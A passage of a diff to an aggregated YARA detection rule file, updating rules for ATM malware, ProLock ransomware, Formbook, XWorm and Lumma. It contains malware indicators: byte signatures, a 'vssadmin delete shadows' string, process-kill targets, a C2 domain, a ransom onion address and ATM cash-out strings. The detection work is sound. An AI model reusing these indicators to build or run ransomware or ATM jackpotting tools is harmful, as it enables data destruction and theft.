"56548c26741b25b15c27a0de498c5e04c69b0c9250ba35e3a578bc2f05eedd07" + hash10 = "c89f1d562983398ab2d6dd75e4e30cc0e95eab57cdf48c4a17619dca9ecc0748" strings: - $PurgeCode = {6a 00 8b 47 08 50 6a 00 6a 01 e8 ?? ?? ?? ?? 50 e8 ?? ?? ?? ?? 8b f0 8b d7 8b c3 e8} - $Mutex1 = "HSDFSD-HFSD-3241-91E7-ASDGSDGHH" nocase ascii - $Mutex2 = "cFgxTERNWEVhM2V" nocase ascii - $ProcessKill1 = "oracle.exe" nocase ascii - $ProcessKill2 = "sqbcoreservice.exe" nocase ascii - $ProcessKill3 = "isqlplussvc.exe" nocase ascii - $ProcessKill4 = "mysqld.exe" nocase ascii - $KillShadowCopies = "vssadmin.exe delete shadows" nocase ascii - $Domain1 = "cdnjs.cloudflare.com" nocase ascii - $Domain2 = "expandingdelegation.top" nocase ascii - $RansomNote = "Entschluesselungs_Anleitung.html" nocase ascii + $EncLayer1 = {0F B6 51 FC 30 50 FF 0F B6 11 30 10 0F B6 51 04 30 50 01 0F B6 51 08 30 50 02} + $EncLayer2 = {B8 4D 5A 00 00 89 33 66 39 06 75 ?? 8b ?? 3c} + $String1 = "NOW ENTER MASTER KEY" ascii nocase + $String2 = "Closing app, than delete myself." ascii nocase + $String3 = "Number of phisical cash units is:" ascii nocase + $String4 = "COULD NOT ENABLE or DISABLE connection" ascii nocase + $String5 = "XFS_DIRECT" ascii nocase + $String6 = "Take the money you snicky mother fucker :)" ascii nocase + $String7 = "ATM IS TEMPORARILY OUT OF SERVICE!" wide nocase + $Code1 = {D1 F8 89 44 24 10 DB 44 24 10 DC 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 35 2F 81 0B 00 A3} + $Code2 = {8B ?? ?? ?? 68 2E 01 00 00 52 C7 ?? 06 01 00 00 00} condition: - uint16(0)==0x5A4D and filesize <1000KB and 5 of them + uint16(0)==0x5A4D and ( filesize <1500KB and all of ($EncLayer*)) or ( filesize <300KB and 4 of ($String*) and all of ($Code*)) } -rule R3C0NST_UNC2891_Slapstick : FILE +rule R3C0NST_ATM_Malware_Javadispcash : FILE { meta: - description = "Detects UNC2891 Slapstick pam backdoor" + description = "Detects ATM Malware JavaDispCash" author = "Frank Boldewin (@r3c0nst)" - id = "a731acff-f657-5877-859e-7447230576df" - date = "2022-03-30" - modified = "2023-01-05" - reference = "https://github.com/fboldewin/YARA-rules/" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/UNC2891_Slapstick.yar#L1-L19" + id = "606d1cb6-7879-569e-ac36-1e2f6a446dc1" + date = "2019-03-28" + modified = "2019-03-28" + reference = "https://twitter.com/r3c0nst/status/1111254169623674882" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Mal.JavaDispCash.yar#L1-L20" license_url = "N/A" - logic_hash = "7777c3b850f5b7ee326be5461ebc3bf37fb201b67ada78b50575fb31f50adf9a" + logic_hash = "dd7c2ccc85038f3ba563f7f814c03668448b292fde36bcf9d06bf20fd341526f" + score = 75 + quality = 74 + tags = "FILE" + hash1 = "0149667c0f8cbfc216ef9d1f3154643cbbf6940e6f24a09c92a82dd7370a5027" + hash2 = "ef407db8c79033027858364fd7a04eeb70cf37b7c3a10069a92bae96da88dfaa" + + strings: + $CashInfo = "getNumberOfCashUnits" nocase ascii wide + $Dispense = "waitforbillstaken" nocase ascii wide + $Inject = "No code to inject!" nocase ascii wide + $config = ".Agentcli" nocase ascii wide + $log1 = "logft.log" nocase ascii wide + $log2 = ".loginside" nocase ascii wide + + condition: + uint16(0)==0x4B50 and filesize <500KB and all of them +} +rule R3C0NST_Prolock_Malware : FILE +{ + meta: + description = "Detects Prolock malware in encrypted and decrypted mode" + author = "Frank Boldewin (@r3c0nst)" + id = "1440b5f5-f1e7-522e-8852-84c326858bb9" + date = "2020-05-17" + modified = "2020-05-20" + reference = "https://raw.githubusercontent.com/fboldewin/YARA-rules/master/Prolock.Malware.yar" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Prolock.Malware.yar#L1-L20" + license_url = "N/A" + logic_hash = "7502011eba1e36c8ec699f1b627c4980cc3009bb43c5aa5a58571330e93211ea" score = 75 quality = 90 tags = "FILE" - hash1 = "9d0165e0484c31bd4ea467650b2ae2f359f67ae1016af49326bb374cead5f789" + hash1 = "a6ded68af5a6e5cc8c1adee029347ec72da3b10a439d98f79f4b15801abd7af0" + hash2 = "dfbd62a3d1b239601e17a5533e5cef53036647901f3fb72be76d92063e279178" strings: - $code1 = {F6 50 04 48 FF C0 48 39 D0 75 F5} - $code2 = {88 01 48 FF C1 8A 11 89 C8 29 F8 84 D2 0F 85} - $str1 = "/proc/self/exe" fullword ascii - $str2 = "%-23s %-23s %-23s %-23s %-23s %s" fullword ascii - $str3 = "pam_sm_authenticate" ascii - $str4 = "ACCESS GRANTED & WELCOME" xor + $DecryptionRoutine1 = {31 04 1A 81 3C 1A 90 90 90 90 74} + $DecryptionRoutine2 = {83 C3 04 81 3C 1A C4 C4 C4 C4 74} + $DecryptedString1 = "support981723721@protonmail.com" nocase ascii + $DecryptedString2 = "Your files have been encrypted by ProLock Ransomware" nocase ascii + $DecryptedString3 = "msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion" nocase ascii + $CryptoCode = {B8 63 51 E1 B7 31 D2 8D BE ?? ?? ?? ?? B9 63 51 E1 B7 81 C1 B9 79 37 9E} condition: - uint32(0)==0x464c457f and filesize <100KB and ( all of ($code*) or all of ($str*)) + (( uint16(0)==0x5A4D) or ( uint16(0)==0x4D42)) and filesize <100KB and all of ($DecryptionRoutine*) or (1 of ($DecryptedString*) and $CryptoCode) } /* * YARA Rule Set * Repository Name: CAPE * Repository: https://github.com/kevoreilly/CAPEv2 - * Retrieval Date: 2024-09-08 - * Git Commit: d7c86e399cc6686df6b065f1a9a79193cc88d0c7 - * Number of Rules: 97 - * Skipped: 0 (age), 11 (quality), 0 (score), 0 (importance) + * Retrieval Date: 2024-09-29 + * Git Commit: 4d96d6a10c48fb0f19472ea18715cb1cd8d35da3 + * Number of Rules: 155 + * Skipped: 0 (age), 13 (quality), 0 (score), 0 (importance) * * * LICENSE @@ -111925,504 +112272,1953 @@ suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. - If you convey an object code work under this section in, or with, or -specifically for use in, a User Product, and the conveying occurs as -part of a transaction in which the right of possession and use of the -User Product is transferred to the recipient in perpetuity or for a -fixed term (regardless of how the transaction is characterized), the -Corresponding Source conveyed under this section must be accompanied -by the Installation Information. But this requirement does not apply -if neither you nor any third party retains the ability to install -modified object code on the User Product (for example, the work has -been installed in ROM). + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Use with the GNU Affero General Public License. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + +The file UserDB.txt is copyrighted by BoB / Team PEiD distributed under the following +MIT license. + +Permission is hereby granted, free of charge, to any person obtaining a copy of this +software and associated documentation files (the "Software"), to deal in the Software +without restriction, including without limitation the rights to use, copy, modify, +merge, publish, distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to the following +conditions: + +The above copyright notice and this permission notice shall be included in all copies +or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, +INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR +PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE +FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR +OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER +DEALINGS IN THE SOFTWARE. + +The file jquery.js is copyrighted by John Resig and dual licensed under the MIT or GPL +Version 2 licenses (see: http://jquery.org/license). + +The files lightbox.js and lightbox.css are copyrighted by Lokesh Dhakar and licensed under +the Creative Commons Attribution 2.5 License +(see: http://creativecommons.org/licenses/by/2.5/). + +The files bootstrap-fileupload.js, jasny-bootstrap.js, jasny-bootstrap.min.js, +jasny-bootstrap.css, jasny-bootstrap.min.css, jasny-bootstrap-responsive.css, +jasny-bootstrap-responsive.min.css are copyrighted by Jasny BV and licensed under the Apache +License, Version 2.0. + +The files bootstrap.min.js, bootstrap.min.css, bootstrap-responsive.min.css, +glyphicons-halflings.png, glyphicons-halflings-white.png are copyrighted by Twitter, Inc. +and licensed under the Apache License, Version 2.0. + +The file analyzer/windows/modules/amsi.py uses parts of pywintrace +(https://github.com/fireeye/pywintrace), which is copyrighted by FireEye, Inc. and licensed +under the Apache License, Version 2.0. + + */ +rule CAPE_Formhooka +{ + meta: + description = "Formbook Anti-hook Bypass" + author = "kevoreilly" + id = "6369de74-99eb-57ae-a315-c15f22effc73" + date = "2024-05-24" + modified = "2024-05-24" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Formbook.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "21b8101a7039cfad0e9d49cc1f055bc23a2eb4c973dcda2a81a007e452d77a6d" + score = 75 + quality = 70 + tags = "" + cape_options = "clear,bp0=$remap_ntdll_0,action0=setedx:ntdll,count0=1,bp1=$remap_ntdll_1,action1=setdst:ntdll,count1=1,force-sleepskip=1" + packed = "9e38c0c3c516583da526016c4c6a671c53333d3d156562717db79eac63587522" + packed = "b8e44f4a0d92297c5bb5b217c121f0d032850b38749044face2b0014e789adfb" + + strings: + $remap_ntdll_0 = {33 56 04 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B} + $remap_ntdll_1 = {33 56 0C 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B} + + condition: + any of them +} +rule CAPE_Formhookb +{ + meta: + description = "Formbook Anti-hook Bypass" + author = "kevoreilly" + id = "f1a1f2b0-7b9b-55ee-9995-63ab2d77bc98" + date = "2024-05-24" + modified = "2024-05-24" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Formbook.yar#L16-L28" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "532970953fe5516ff92bc1491ae68869880484ab0fe81fce160f9848999f447f" + score = 75 + quality = 70 + tags = "" + cape_options = "clear,bp0=$decode,action0=scan,hc0=1,bp1=$remap_ntdll+6,action1=setdst:ntdll,count=0,force-sleepskip=1" + packed = "08c5f44d57f5ccc285596b3d9921bf7fbbbf7f9a827bb3285a800e4c9faf6731" + + strings: + $decode = {55 8B EC 83 EC 24 53 56 57 [480-520] 8B E5 5D C3} + $remap_ntdll = {90 90 90 90 90 90 8B (86 [2] 00 00|46 ??|06) 5F 5E 5B 8B E5 5D C3} + + condition: + any of them +} +rule CAPE_Formconfa +{ + meta: + description = "Formbook Config Extraction" + author = "kevoreilly" + id = "f9c3fc92-e2c8-5968-b0f4-80bd8199b7ca" + date = "2024-05-24" + modified = "2024-05-24" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Formbook.yar#L30-L42" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "b0aa4cec55a21245d8104380c531dd6cc0fdef64fbefd79616eadfb4e95b2d75" + score = 75 + quality = 70 + tags = "" + cape_options = "clear,bp0=$c2,action0=string:rcx+1,bp1=$decoy+67,action1=string:rcx+1,count=0,typestring=Formbook Config" + packed = "b8e44f4a0d92297c5bb5b217c121f0d032850b38749044face2b0014e789adfb" + + strings: + $c2 = {44 8B C6 48 8B D3 49 8B CE E8 [4] 44 88 23 41 8B DD 48 8D [2] 66 66 66 0F 1F 84 00 00 00 00 00 BA 8D 00 00 00 41 FF C4} + $decoy = {8B D7 0F 1F 44 00 00 0F B6 03 FF C0 48 98 48 03 D8 48 FF CA 75 ?? 44 0F B6 03 48 8D 53 01 48 8D 4C [2] E8} + + condition: + all of them +} +rule CAPE_Formhelper +{ + meta: + description = "Formbook Config Extraction" + author = "kevoreilly" + id = "88ff1354-1ae7-5380-a586-ef95212d59df" + date = "2024-05-24" + modified = "2024-05-24" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Formbook.yar#L44-L56" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "77cdfc94aac089c4f2590f4afbab35351fc6e104e67813548c68c59d27019a63" + score = 75 + quality = 70 + tags = "" + cape_options = "clear,bp2=$config,action2=scan,count=0" + packed = "0270016f451f9ba630f2ea4e2ea006fb89356627835b560bb2f4551a735ba0e1" + + strings: + $config = {40 55 53 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 [4] 48 81 EC [2] 00 00 45 33 ?? 33 C0 4C 8B E9 4C 89} + $decode = {66 66 66 66 0F 1F 84 00 00 00 00 00 0F B6 41 01 48 FF C9 28 41 01 49 FF C9} + + condition: + all of them +} +rule CAPE_Formconfb +{ + meta: + description = "Formbook Config Extraction" + author = "kevoreilly" + id = "4c8c7939-07e8-5a1e-92a3-b62e322fb9b6" + date = "2024-05-24" + modified = "2024-05-24" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Formbook.yar#L58-L72" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "8a96ef5c6cebb51186acd099b795066e8e8b2c2adbed4dcc66b81228f70e5c4f" + score = 75 + quality = 70 + tags = "" + cape_options = "clear,bp0=$c2_1,bp0=$c2_2+38,action0=string:rcx+1,bp1=$decoy,action1=string:rcx+1,bp2=$config,action2=scan,count=0,typestring=Formbook Config" + packed = "60571b2683e7b753a77029ebe9b5e1cb9f3fbfa8d6a43e4b7239eefd13141ae4" + + strings: + $c2_1 = {44 0F B6 5D ?? 45 84 DB 74 ?? 48 8D 4D [1-5] 41 80 FB 2F 74 11 0F B6 41 01 48 FF C1 FF C3 44 0F B6 D8 84 C0 75} + $c2_2 = {49 8D 8D [2] 00 00 B2 ?? E8 [4] 4D 8D 85 [2] 00 00 49 8D 8D [2] 00 00 BA ?? 00 00 00 E8} + $decoy = {45 3B B5 [2] 00 00 [0-7] 44 8D 1C 33 48 8D 7D [1-5] 42 C6 44 [2] 00 [0-4] 48 8B CF E8} + $config = {40 55 53 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 [4] 48 81 EC [2] 00 00 45 33 F6 33 C0 4C 8B E9 4C 89 75} + + condition: + 2 of them +} +rule CAPE_Formconfc +{ + meta: + description = "Formbook Config Extraction" + author = "kevoreilly" + id = "cf155b6e-0821-5044-a84e-e4a101e55edd" + date = "2024-05-24" + modified = "2024-05-24" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Formbook.yar#L74-L86" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "f52bce00d2ec88682115a8720f0a182b7ef7fe7b9b9fc466bb8ddc1779341509" + score = 75 + quality = 70 + tags = "" + cape_options = "clear,bp0=$c2,hc0=1,action0=string:rcx+1,bp1=$decoy,action1=string:rcx+1,count=0,typestring=Formbook Config" + packed = "0270016f451f9ba630f2ea4e2ea006fb89356627835b560bb2f4551a735ba0e1" + + strings: + $c2 = {49 8D 95 [2] 00 00 49 8D 8D [2] 00 00 41 B8 07 00 00 00 E8 [4] 49 8B CD 45 88 [3] 00 00 E8 [4] 33 C0} + $decoy = {48 8B CF E8 [4] 48 8B D7 44 8B C0 49 8B 85 [4] 49 (8D 8C 04 [2] 00 00|8D 0C 04) E8 [4] 48 8B CF E8} + + condition: + all of them +} +rule CAPE_Xworm +{ + meta: + description = "XWorm Config Extractor" + author = "kevoreilly" + id = "0f55dbfb-c239-53f2-a1e0-bfa494558d6e" + date = "2023-11-07" + modified = "2023-11-07" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/XWorm.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "d8e103f3470e83d71cd4992b74698c0721b8a69d764fdb7a4543997b2853014a" + score = 75 + quality = 70 + tags = "" + cape_options = "bp0=$decrypt+11,action0=string:r10,count=1,typestring=XWorm Config" + + strings: + $decrypt = {45 33 C0 39 09 FF 15 [4] 48 8B F0 E8 [4] 48 8B C8 48 8B D6 48 8B 00 48 8B 40 68 FF 50 ?? 90} + + condition: + any of them +} +rule CAPE_Lumma : FILE +{ + meta: + description = "Lumma config extraction" + author = "kevoreilly" + id = "b2166620-3070-5727-b189-e6959cc5b698" + date = "2024-05-09" + modified = "2024-05-09" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Lumma.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "a8f9212b619796f91f14c4164e4d2f30c66b51118f22f3d6c310841b6707b7b0" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$decode+5,action0=string:ebp,count=0,bp1=$patch+8,action1=skip,typestring=Lumma Config" + packed = "0ee580f0127b821f4f1e7c032cf76475df9724a9fade2e153a69849f652045f8" + + strings: + $c2 = {8D 44 24 ?? 50 89 4C 24 ?? FF 31 E8 [4] 83 C4 08 B8 FF FF FF FF} + $decode = {C6 44 05 00 00 83 C4 2C 5E 5F 5B 5D C3} + $patch = {66 C7 0? 00 00 8B 46 1? C6 00 01 8B} + + condition: + uint16(0)==0x5a4d and 2 of them +} +rule CAPE_Lummaremap +{ + meta: + description = "Lumma ntdll-remap bypass" + author = "kevoreilly" + id = "93ae37d1-a38a-5f96-8bb3-cc648a49b588" + date = "2024-05-09" + modified = "2024-05-09" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = 